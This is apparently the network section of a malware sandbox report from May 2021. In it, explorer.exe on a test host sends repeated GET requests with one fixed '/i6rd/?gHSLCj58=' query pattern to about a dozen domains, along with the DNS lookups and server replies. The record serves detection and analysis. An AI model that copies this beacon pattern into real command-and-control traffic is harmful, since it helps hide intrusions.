May 12, 2021 15:47:09.577151060 CEST | 64801 | 53 | 192.168.2.4 | 8.8.8.8
May 12, 2021 15:47:09.645700932 CEST | 53 | 64801 | 8.8.8.8 | 192.168.2.4
May 12, 2021 15:47:20.309665918 CEST | 61721 | 53 | 192.168.2.4 | 8.8.8.8
May 12, 2021 15:47:20.362169981 CEST | 53 | 61721 | 8.8.8.8 | 192.168.2.4
May 12, 2021 15:47:31.677963972 CEST | 51255 | 53 | 192.168.2.4 | 8.8.8.8
May 12, 2021 15:47:31.743438959 CEST | 53 | 51255 | 8.8.8.8 | 192.168.2.4
May 12, 2021 15:47:45.299787045 CEST | 61522 | 53 | 192.168.2.4 | 8.8.8.8
May 12, 2021 15:47:45.413086891 CEST | 53 | 61522 | 8.8.8.8 | 192.168.2.4
May 12, 2021 15:47:46.130975962 CEST | 52337 | 53 | 192.168.2.4 | 8.8.8.8
May 12, 2021 15:47:46.191771030 CEST | 53 | 52337 | 8.8.8.8 | 192.168.2.4
May 12, 2021 15:47:46.821439981 CEST | 55046 | 53 | 192.168.2.4 | 8.8.8.8
May 12, 2021 15:47:47.108288050 CEST | 53 | 55046 | 8.8.8.8 | 192.168.2.4
May 12, 2021 15:47:47.545085907 CEST | 49612 | 53 | 192.168.2.4 | 8.8.8.8
May 12, 2021 15:47:47.602678061 CEST | 53 | 49612 | 8.8.8.8 | 192.168.2.4
May 12, 2021 15:47:48.207484961 CEST | 49285 | 53 | 192.168.2.4 | 8.8.8.8
May 12, 2021 15:47:48.265036106 CEST | 53 | 49285 | 8.8.8.8 | 192.168.2.4
May 12, 2021 15:47:48.434736967 CEST | 50601 | 53 | 192.168.2.4 | 8.8.8.8
May 12, 2021 15:47:48.502091885 CEST | 53 | 50601 | 8.8.8.8 | 192.168.2.4
May 12, 2021 15:47:49.084553003 CEST | 60875 | 53 | 192.168.2.4 | 8.8.8.8
May 12, 2021 15:47:49.147979021 CEST | 53 | 60875 | 8.8.8.8 | 192.168.2.4
May 12, 2021 15:47:49.649899960 CEST | 56448 | 53 | 192.168.2.4 | 8.8.8.8
May 12, 2021 15:47:49.715104103 CEST | 53 | 56448 | 8.8.8.8 | 192.168.2.4
May 12, 2021 15:47:49.715118885 CEST | 59172 | 53 | 192.168.2.4 | 8.8.8.8
May 12, 2021 15:47:49.763880014 CEST | 53 | 59172 | 8.8.8.8 | 192.168.2.4
May 12, 2021 15:47:50.554244041 CEST | 62420 | 53 | 192.168.2.4 | 8.8.8.8
May 12, 2021 15:47:50.611854076 CEST | 53 | 62420 | 8.8.8.8 | 192.168.2.4
May 12, 2021 15:47:51.538911104 CEST | 60579 | 53 | 192.168.2.4 | 8.8.8.8
May 12, 2021 15:47:51.600545883 CEST | 53 | 60579 | 8.8.8.8 | 192.168.2.4
May 12, 2021 15:47:52.124300957 CEST | 50183 | 53 | 192.168.2.4 | 8.8.8.8
May 12, 2021 15:47:52.176544905 CEST | 53 | 50183 | 8.8.8.8 | 192.168.2.4
May 12, 2021 15:47:52.782249928 CEST | 61531 | 53 | 192.168.2.4 | 8.8.8.8
May 12, 2021 15:47:52.844850063 CEST | 53 | 61531 | 8.8.8.8 | 192.168.2.4
May 12, 2021 15:47:54.907033920 CEST | 49228 | 53 | 192.168.2.4 | 8.8.8.8
May 12, 2021 15:47:55.083226919 CEST | 53 | 49228 | 8.8.8.8 | 192.168.2.4
May 12, 2021 15:48:01.799061060 CEST | 59794 | 53 | 192.168.2.4 | 8.8.8.8
May 12, 2021 15:48:01.870407104 CEST | 53 | 59794 | 8.8.8.8 | 192.168.2.4
May 12, 2021 15:48:07.185003042 CEST | 55916 | 53 | 192.168.2.4 | 8.8.8.8
May 12, 2021 15:48:07.567153931 CEST | 53 | 55916 | 8.8.8.8 | 192.168.2.4
May 12, 2021 15:48:13.299730062 CEST | 52752 | 53 | 192.168.2.4 | 8.8.8.8
May 12, 2021 15:48:13.560631990 CEST | 53 | 52752 | 8.8.8.8 | 192.168.2.4
May 12, 2021 15:48:18.851711988 CEST | 60542 | 53 | 192.168.2.4 | 8.8.8.8
May 12, 2021 15:48:18.925479889 CEST | 53 | 60542 | 8.8.8.8 | 192.168.2.4
May 12, 2021 15:48:22.347239017 CEST | 60689 | 53 | 192.168.2.4 | 8.8.8.8
May 12, 2021 15:48:22.414751053 CEST | 53 | 60689 | 8.8.8.8 | 192.168.2.4
May 12, 2021 15:48:24.136452913 CEST | 64206 | 53 | 192.168.2.4 | 8.8.8.8
May 12, 2021 15:48:24.190939903 CEST | 50904 | 53 | 192.168.2.4 | 8.8.8.8
May 12, 2021 15:48:24.202259064 CEST | 53 | 64206 | 8.8.8.8 | 192.168.2.4
May 12, 2021 15:48:24.262418032 CEST | 53 | 50904 | 8.8.8.8 | 192.168.2.4
May 12, 2021 15:48:29.346699953 CEST | 57525 | 53 | 192.168.2.4 | 8.8.8.8
May 12, 2021 15:48:29.420010090 CEST | 53 | 57525 | 8.8.8.8 | 192.168.2.4
May 12, 2021 15:48:34.661406040 CEST | 53814 | 53 | 192.168.2.4 | 8.8.8.8
May 12, 2021 15:48:34.835792065 CEST | 53 | 53814 | 8.8.8.8 | 192.168.2.4
May 12, 2021 15:48:40.305569887 CEST | 53418 | 53 | 192.168.2.4 | 8.8.8.8
May 12, 2021 15:48:40.366614103 CEST | 53 | 53418 | 8.8.8.8 | 192.168.2.4
May 12, 2021 15:48:45.458513021 CEST | 62833 | 53 | 192.168.2.4 | 8.8.8.8
May 12, 2021 15:48:45.522173882 CEST | 53 | 62833 | 8.8.8.8 | 192.168.2.4
May 12, 2021 15:48:55.627368927 CEST | 59260 | 53 | 192.168.2.4 | 8.8.8.8
May 12, 2021 15:48:55.690572977 CEST | 53 | 59260 | 8.8.8.8 | 192.168.2.4

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
May 12, 2021 15:47:49.649899960 CEST | 192.168.2.4 | 8.8.8.8 | 0xf9d0 | Standard query (0) | www.thebenefitssherpa.com | A (IP address) | IN (0x0001)
May 12, 2021 15:47:54.907033920 CEST | 192.168.2.4 | 8.8.8.8 | 0x5743 | Standard query (0) | www.onlinecasinocrazy.com | A (IP address) | IN (0x0001)
May 12, 2021 15:48:01.799061060 CEST | 192.168.2.4 | 8.8.8.8 | 0x9a46 | Standard query (0) | www.blissfulbeeboutique.online | A (IP address) | IN (0x0001)
May 12, 2021 15:48:07.185003042 CEST | 192.168.2.4 | 8.8.8.8 | 0xd198 | Standard query (0) | www.cityofhouston.info | A (IP address) | IN (0x0001)
May 12, 2021 15:48:13.299730062 CEST | 192.168.2.4 | 8.8.8.8 | 0xaea8 | Standard query (0) | www.socialeconomic.net | A (IP address) | IN (0x0001)
May 12, 2021 15:48:18.851711988 CEST | 192.168.2.4 | 8.8.8.8 | 0x726b | Standard query (0) | www.toypoodlebreedershome.com | A (IP address) | IN (0x0001)
May 12, 2021 15:48:24.136452913 CEST | 192.168.2.4 | 8.8.8.8 | 0x30ce | Standard query (0) | www.ricdevan.com | A (IP address) | IN (0x0001)
May 12, 2021 15:48:29.346699953 CEST | 192.168.2.4 | 8.8.8.8 | 0xf6e2 | Standard query (0) | www.ximibabes.com | A (IP address) | IN (0x0001)
May 12, 2021 15:48:34.661406040 CEST | 192.168.2.4 | 8.8.8.8 | 0xcfb4 | Standard query (0) | www.sabaidiving.com | A (IP address) | IN (0x0001)
May 12, 2021 15:48:40.305569887 CEST | 192.168.2.4 | 8.8.8.8 | 0xb2a5 | Standard query (0) | www.onemoresysadmin.com | A (IP address) | IN (0x0001)
May 12, 2021 15:48:45.458513021 CEST | 192.168.2.4 | 8.8.8.8 | 0x4cc3 | Standard query (0) | www.countrywideeconomy.com | A (IP address) | IN (0x0001)
May 12, 2021 15:48:55.627368927 CEST | 192.168.2.4 | 8.8.8.8 | 0xfd6 | Standard query (0) | www.woo.education | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
May 12, 2021 15:47:49.715104103 CEST | 8.8.8.8 | 192.168.2.4 | 0xf9d0 | No error (0) | www.thebenefitssherpa.com | thebenefitssherpa.com | - | CNAME (Canonical name) | IN (0x0001)
May 12, 2021 15:47:49.715104103 CEST | 8.8.8.8 | 192.168.2.4 | 0xf9d0 | No error (0) | thebenefitssherpa.com | - | 34.102.136.180 | A (IP address) | IN (0x0001)
May 12, 2021 15:47:55.083226919 CEST | 8.8.8.8 | 192.168.2.4 | 0x5743 | No error (0) | www.onlinecasinocrazy.com | onlinecasinocrazy.com | - | CNAME (Canonical name) | IN (0x0001)
May 12, 2021 15:47:55.083226919 CEST | 8.8.8.8 | 192.168.2.4 | 0x5743 | No error (0) | onlinecasinocrazy.com | - | 119.81.45.82 | A (IP address) | IN (0x0001)
May 12, 2021 15:48:01.870407104 CEST | 8.8.8.8 | 192.168.2.4 | 0x9a46 | No error (0) | www.blissfulbeeboutique.online | ext-sq.squarespace.com | - | CNAME (Canonical name) | IN (0x0001)
May 12, 2021 15:48:01.870407104 CEST | 8.8.8.8 | 192.168.2.4 | 0x9a46 | No error (0) | ext-sq.squarespace.com | - | 198.185.159.144 | A (IP address) | IN (0x0001)
May 12, 2021 15:48:01.870407104 CEST | 8.8.8.8 | 192.168.2.4 | 0x9a46 | No error (0) | ext-sq.squarespace.com | - | 198.49.23.145 | A (IP address) | IN (0x0001)
May 12, 2021 15:48:01.870407104 CEST | 8.8.8.8 | 192.168.2.4 | 0x9a46 | No error (0) | ext-sq.squarespace.com | - | 198.185.159.145 | A (IP address) | IN (0x0001)
May 12, 2021 15:48:01.870407104 CEST | 8.8.8.8 | 192.168.2.4 | 0x9a46 | No error (0) | ext-sq.squarespace.com | - | 198.49.23.144 | A (IP address) | IN (0x0001)
May 12, 2021 15:48:07.567153931 CEST | 8.8.8.8 | 192.168.2.4 | 0xd198 | No error (0) | www.cityofhouston.info | cityofhouston.info | - | CNAME (Canonical name) | IN (0x0001)
May 12, 2021 15:48:07.567153931 CEST | 8.8.8.8 | 192.168.2.4 | 0xd198 | No error (0) | cityofhouston.info | - | 103.15.186.68 | A (IP address) | IN (0x0001)
May 12, 2021 15:48:13.560631990 CEST | 8.8.8.8 | 192.168.2.4 | 0xaea8 | No error (0) | www.socialeconomic.net | socialeconomic.net | - | CNAME (Canonical name) | IN (0x0001)
May 12, 2021 15:48:13.560631990 CEST | 8.8.8.8 | 192.168.2.4 | 0xaea8 | No error (0) | socialeconomic.net | - | 51.222.80.112 | A (IP address) | IN (0x0001)
May 12, 2021 15:48:18.925479889 CEST | 8.8.8.8 | 192.168.2.4 | 0x726b | No error (0) | www.toypoodlebreedershome.com | toypoodlebreedershome.com | - | CNAME (Canonical name) | IN (0x0001)
May 12, 2021 15:48:18.925479889 CEST | 8.8.8.8 | 192.168.2.4 | 0x726b | No error (0) | toypoodlebreedershome.com | - | 81.88.52.88 | A (IP address) | IN (0x0001)
May 12, 2021 15:48:24.202259064 CEST | 8.8.8.8 | 192.168.2.4 | 0x30ce | No error (0) | www.ricdevan.com | - | 185.53.177.53 | A (IP address) | IN (0x0001)
May 12, 2021 15:48:29.420010090 CEST | 8.8.8.8 | 192.168.2.4 | 0xf6e2 | No error (0) | www.ximibabes.com | ximyumi.myshopify.com | - | CNAME (Canonical name) | IN (0x0001)
May 12, 2021 15:48:29.420010090 CEST | 8.8.8.8 | 192.168.2.4 | 0xf6e2 | No error (0) | ximyumi.myshopify.com | shops.myshopify.com | - | CNAME (Canonical name) | IN (0x0001)
May 12, 2021 15:48:29.420010090 CEST | 8.8.8.8 | 192.168.2.4 | 0xf6e2 | No error (0) | shops.myshopify.com | - | 23.227.38.74 | A (IP address) | IN (0x0001)
May 12, 2021 15:48:34.835792065 CEST | 8.8.8.8 | 192.168.2.4 | 0xcfb4 | No error (0) | www.sabaidiving.com | - | 192.64.147.164 | A (IP address) | IN (0x0001)
May 12, 2021 15:48:40.366614103 CEST | 8.8.8.8 | 192.168.2.4 | 0xb2a5 | No error (0) | www.onemoresysadmin.com | onemoresysadmin.com | - | CNAME (Canonical name) | IN (0x0001)
May 12, 2021 15:48:40.366614103 CEST | 8.8.8.8 | 192.168.2.4 | 0xb2a5 | No error (0) | onemoresysadmin.com | - | 192.0.78.24 | A (IP address) | IN (0x0001)
May 12, 2021 15:48:40.366614103 CEST | 8.8.8.8 | 192.168.2.4 | 0xb2a5 | No error (0) | onemoresysadmin.com | - | 192.0.78.25 | A (IP address) | IN (0x0001)
May 12, 2021 15:48:45.522173882 CEST | 8.8.8.8 | 192.168.2.4 | 0x4cc3 | No error (0) | www.countrywideeconomy.com | - | 52.58.78.16 | A (IP address) | IN (0x0001)
May 12, 2021 15:48:55.690572977 CEST | 8.8.8.8 | 192.168.2.4 | 0xfd6 | Name error (3) | www.woo.education | none | none | A (IP address) | IN (0x0001)

HTTP Request Dependency Graph

• www.thebenefitssherpa.com
• www.onlinecasinocrazy.com
• www.blissfulbeeboutique.online
• www.cityofhouston.info
• www.socialeconomic.net
• www.toypoodlebreedershome.com
• www.ricdevan.com
• www.ximibabes.com
• www.sabaidiving.com
• www.onemoresysadmin.com
• www.countrywideeconomy.com

                                                                  HTTP Packets

                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  0192.168.2.44975234.102.136.18080C:\Windows\explorer.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  May 12, 2021 15:47:49.762125969 CEST1675OUTGET /i6rd/?gHSLCj58=LPK2IT8klZq3HV5LkVv0HrUERmrfkAigbODxoDO8ybIsb03GvAFTkZSuj3fGszWvHktP&9rJ=N8YdlZih HTTP/1.1
                                                                  Host: www.thebenefitssherpa.com
                                                                  Connection: close
                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                  Data Ascii:
                                                                  May 12, 2021 15:47:49.899209023 CEST1684INHTTP/1.1 403 Forbidden
                                                                  Server: openresty
                                                                  Date: Wed, 12 May 2021 13:47:49 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 275
                                                                  ETag: "60995c26-113"
                                                                  Via: 1.1 google
                                                                  Connection: close
                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                  Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.4 | 49762 | 119.81.45.82 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
May 12, 2021 15:47:55.530891895 CEST | 5420 | OUT | GET /i6rd/?gHSLCj58=erkeaSWQY+Clkg2r/Pi/REnUuZTidSmaWK+TmjN6ZRgeJAvAzvFr0iNL5kMJBQzOKWdi&9rJ=N8YdlZih HTTP/1.1
Host: www.onlinecasinocrazy.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
10 | 192.168.2.4 | 49773 | 52.58.78.16 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
May 12, 2021 15:48:45.566056013 CEST | 6199 | OUT | GET /i6rd/?gHSLCj58=HOLe4E5VAs/9VGl0AghSjQ5UDYBgOj/qhjKLxJJROTaYJ7IE9VG9ZYc05xBD+gnk3HpC&9rJ=N8YdlZih HTTP/1.1
Host: www.countrywideeconomy.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
May 12, 2021 15:48:45.607007027 CEST | 6200 | IN | HTTP/1.1 410 Gone
Server: openresty
Date: Wed, 12 May 2021 13:47:39 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Data Ascii: 7<html>9 <head>56 <meta http-equiv='refresh' content='5; url=http://www.countrywideeconomy.com/' />a </head>9 <body>42 You are being redirected to http://www.countrywideeconomy.coma </body>8</html>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.4 | 49763 | 198.185.159.144 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
May 12, 2021 15:48:02.005036116 CEST | 6102 | OUT | GET /i6rd/?gHSLCj58=smN73hIgGm+8k6TIdjzBFwruzJIggaSM7b/fO07bhI8vXH2xBAb/Cwk8Hoq4ZaNv9SU/&9rJ=N8YdlZih HTTP/1.1
Host: www.blissfulbeeboutique.online
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
May 12, 2021 15:48:02.140299082 CEST | 6103 | IN | HTTP/1.1 400 Bad Request
Cache-Control: no-cache, must-revalidate
Content-Length: 77564
Content-Type: text/html; charset=UTF-8
Date: Wed, 12 May 2021 13:48:02 UTC
Expires: Thu, 01 Jan 1970 00:00:00 UTC
Pragma: no-cache
Server: Squarespace
X-Contextid: gCs6earh/9UltTqOd
Connection: close
Data Ascii: <!DOCTYPE html><head> <title>400 Bad Request</title> <meta name="viewport" content="width=device-width, initial-scale=1"> <style type="text/css"> body { background: white; } main { position: absolute; top: 50%; left: 50%; transform: translate(-50%, -50%); text-align: center; min-width: 95vw; } main h1 { font-weight: 300; font-size: 4.6em; color: #191919; margin: 0 0 11px 0; } main p { font-size: 1.4em; color: #3a3a3a; font-weight: 300; line-height: 2em; margin: 0; } main p a { color: #3a3a3a; text-decoration: none; border-bottom: solid 1px #3a3a3a; } body { font-family: "Clarkson", sans-serif; font-size: 12px; } #status-page { display: none; } footer { position: absolute; bottom: 22px; left: 0; width: 100%; text-align: center; line-height: 2em; } footer span { margin: 0 11px; font-size: 1em;


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
3 | 192.168.2.4 | 49764 | 103.15.186.68 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
May 12, 2021 15:48:07.924396992 CEST | 6139 | OUT | GET /i6rd/?gHSLCj58=OPhbRlTkoXrsQ0r3dKw1IvWRRcBcb3Q4dmj86tcXQUJSZPkW56a8j7HjPVLeeIGxTFMj&9rJ=N8YdlZih HTTP/1.1
Host: www.cityofhouston.info
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
May 12, 2021 15:48:08.279015064 CEST | 6139 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.14.0
Date: Wed, 12 May 2021 13:48:08 GMT
Content-Type: text/html; charset=iso-8859-1
Content-Length: 387
Connection: close
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache Server at www.cityofhouston.info Port 80</address></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
4 | 192.168.2.4 | 49765 | 51.222.80.112 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
May 12, 2021 15:48:13.697396994 CEST | 6140 | OUT | GET /i6rd/?gHSLCj58=ghT/ntM+diyN3YW/4q0tO05CJd4dCe68Gx0VtJcOz7kJ2fBcIsU6AMgtishNfwDLzL+S&9rJ=N8YdlZih HTTP/1.1
Host: www.socialeconomic.net
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
May 12, 2021 15:48:13.830612898 CEST | 6141 | IN | HTTP/1.1 301 Moved Permanently
Date: Wed, 12 May 2021 13:48:13 GMT
Server: Apache
Content-Security-Policy: upgrade-insecure-requests;
Location: https://www.socialeconomic.net/i6rd/?gHSLCj58=ghT/ntM+diyN3YW/4q0tO05CJd4dCe68Gx0VtJcOz7kJ2fBcIsU6AMgtishNfwDLzL+S&9rJ=N8YdlZih
Content-Length: 339
Connection: close
Content-Type: text/html; charset=iso-8859-1
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.socialeconomic.net/i6rd/?gHSLCj58=ghT/ntM+diyN3YW/4q0tO05CJd4dCe68Gx0VtJcOz7kJ2fBcIsU6AMgtishNfwDLzL+S&amp;9rJ=N8YdlZih">here</a>.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
5 | 192.168.2.4 | 49766 | 81.88.52.88 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
May 12, 2021 15:48:19.008239031 CEST | 6142 | OUT | GET /i6rd/?gHSLCj58=87tzyM19Su4M9sklYGX+FxwUh158b1qmSh9f/APlSoINpVQ2gCQ5Erv1vAVp92mNDUWx&9rJ=N8YdlZih HTTP/1.1
Host: www.toypoodlebreedershome.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
May 12, 2021 15:48:19.092015982 CEST | 6143 | IN | HTTP/1.1 404 Not Found
Date: Wed, 12 May 2021 13:48:19 GMT
Server: Apache
Upgrade: h2,h2c
Connection: Upgrade, close
Accept-Ranges: bytes
Transfer-Encoding: chunked
Content-Type: text/html
Data Ascii: 113df<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/> <style type="text/css"> body { font-family: Arial,Helvetica Neue,Helvetica,sans-serif; text-align:center; text-shadow:0 1px #fff; -webkit-text-shadow:0 1px #fff; -moz-text-shadow:0 1px #fff; } h1 { font-size: 22px; color: #900; font-weight: bold; } h2 { font-size: 16px; color: #000000; font-weight: bold; }h3 { font-size: 16px; color: #000000; font-weight: normal; } #conts { min-width:640px; margin: 30px; background-color: #fff; padding: 40px 20px; font-size: 14px; /*width: 90%; height: 100%;*/ border: 1px dotted #999; background:#eee; } </style> <title>8d404 Not Found </title> </head> <body> <div id="conts">
May 12, 2021 15:48:19.092034101 CEST | 6143 | IN | Data Raw: 20 20 3c 64 69 76 3e 0a 09 09 09 09 3c 68 31 3e 0d 0a 31 62 0d 0a 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64
Data Ascii: <div><h1>1b404 Not Found
May 12, 2021 15:48:19.092042923 CEST | 6144 | IN | Data Raw: 3c 2f 68 31 3e 0a 09 09 09 09 3c 68 32 3e 0d 0a 33 39 0d 0a 54 68 65 20 73 65 72 76 65 72 20 63 61 6e 20 6e 6f 74 20 66 69 6e 64 20 74 68 65 20 72 65 71 75 65 73 74 65 64 20 70 61 67 65 3a 3c 2f 68 32 3e 0a 09 09 09 09 3c 68 33 3e 0d 0a 31 64 0d
Data Ascii: </h1><h2>39The server can not find the requested page:</h2><h3>1dwww.toypoodlebreedershome.com6c/i6rd/?gHSLCj58=87tzyM19Su4M9sklYGX+FxwUh158b1qmSh9f/APlSoINpVQ2gCQ5Erv1vAVp92mNDUWx&amp;9rJ=N8YdlZih (port 5780)</h3>
May 12, 2021 15:48:19.092062950 CEST | 6144 | IN | Data Raw: 0d 0a 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
6 | 192.168.2.4 | 49768 | 185.53.177.53 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
May 12, 2021 15:48:24.287259102 CEST | 6154 | OUT | GET /i6rd/?gHSLCj58=lFTIMkQ5ik6igxl0SADoA/l4wqgGqwWePHw2ryfpEDmwfQ+0wMbe0XdxLJthRM6xta9b&9rJ=N8YdlZih HTTP/1.1
Host: www.ricdevan.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
May 12, 2021 15:48:24.329476118 CEST | 6155 | IN | HTTP/1.1 403 Forbidden
Server: nginx
Date: Wed, 12 May 2021 13:48:24 GMT
Content-Type: text/html
Content-Length: 146
Connection: close
                                                                  Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


Session ID:7
Source IP:192.168.2.4
Source Port:49770
Destination IP:23.227.38.74
Destination Port:80
Process:C:\Windows\explorer.exe

Timestamp:May 12, 2021 15:48:29.463149071 CEST
kBytes transferred:6187
Direction:OUT
Data:
GET /i6rd/?gHSLCj58=/0C7Nd/5ZhwBGDRTMer0ywO01wFnuraj4upl6M1zLF0nwnsKqCnReLNuI6TuwxtThkOZ&9rJ=N8YdlZih HTTP/1.1
Host: www.ximibabes.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:

Timestamp:May 12, 2021 15:48:29.644690037 CEST
kBytes transferred:6189
Direction:IN
Data:
HTTP/1.1 403 Forbidden
Date: Wed, 12 May 2021 13:48:29 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
X-Sorting-Hat-PodId: -1
X-Dc: gcp-us-central1
X-Request-ID: 975553ed-19fe-4a52-aebe-ef54f52968ad
X-Download-Options: noopen
X-Content-Type-Options: nosniff
X-Permitted-Cross-Domain-Policies: none
X-XSS-Protection: 1; mode=block
CF-Cache-Status: DYNAMIC
cf-request-id: 0a026f1db800002c3ef937b000000001
Server: cloudflare
CF-RAY: 64e41adc5b862c3e-FRA
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
Data Ascii: 5c6<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="referrer" content="never" /> <title>Access denied</title> <style type="text/css"> *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#F1F1F1;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}a:hover{border-bottom-color:#A9A9A9}h1{font-size:1.8rem;font-weight:400;margin:0 0 1.4rem 0}p{font-size:1.5rem;margin:0}.page{padding:4rem 3.5rem;margin:0;display:flex;min-height:100vh;flex-direction:column}.text-

Timestamp:May 12, 2021 15:48:29.644754887 CEST
kBytes transferred:6190
Direction:IN
Data Ascii: container--main{flex:1;display:flex;align-items:start;margin-bottom:1.6rem}.action{border:1px solid #A9A9A9;padding:1.2rem 2.5rem;border-radius:6px;text-decoration:none;margin-top:1.6rem;display:inline-block;font-size:1.5rem;transition:border-

Timestamp:May 12, 2021 15:48:29.644808054 CEST
kBytes transferred:6191
Direction:IN
Data Ascii: e57 "Přístup byl odepřen", "content-title": "Nemáte oprávnění k přístupu k tomuto webu" }, "nb": { "title": "Tilgang nektet", "content-title": "Du har ikke tillatelse til å åpne dette nettstedet" }, "th": {

Timestamp:May 12, 2021 15:48:29.644862890 CEST
kBytes transferred:6192
Direction:IN
Data Ascii: igung für den Zugriff auf diese Website" }, "it": { "title": "Accesso negato", "content-title": "Non hai l’autorizzazione per accedere a questo sito web" }, "pl": { "title": "Odmowa dostępu", "content-title": "Nie m

Timestamp:May 12, 2021 15:48:29.644918919 CEST
kBytes transferred:6193
Direction:IN
Data Ascii: im reddedildi", "content-title": "Bu web sitesine erişim izniniz yok." }, "zh-CN": { "title": "", "content-title": "" }, "nl": { "title": "Toegang geweigerd", "content-title":

Timestamp:May 12, 2021 15:48:29.644958019 CEST
kBytes transferred:6194
Direction:IN
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID:8
Source IP:192.168.2.4
Source Port:49771
Destination IP:192.64.147.164
Destination Port:80
Process:C:\Windows\explorer.exe

Timestamp:May 12, 2021 15:48:35.011543036 CEST
kBytes transferred:6195
Direction:OUT
Data:
GET /i6rd/?gHSLCj58=kbJM45GZrQKbh6aR4KV/wVFZMmwDJvkUUs1obqo0rCdmSsWUtmFh0yx89FvYawyrRJzX&9rJ=N8YdlZih HTTP/1.1
Host: www.sabaidiving.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:

Timestamp:May 12, 2021 15:48:35.250890970 CEST
kBytes transferred:6196
Direction:IN
Data:
HTTP/1.1 404 Not Found
Date: Wed, 12 May 2021 13:48:35 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.3.8
Set-Cookie: session=4d36d09bac3145dfbd0fe2ea9e6a7871; expires=Wed, 12-May-2021 14:18:35 GMT; path=/
Vary: Accept-Encoding,User-Agent
P3P: CP="CAO PSA OUR"
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
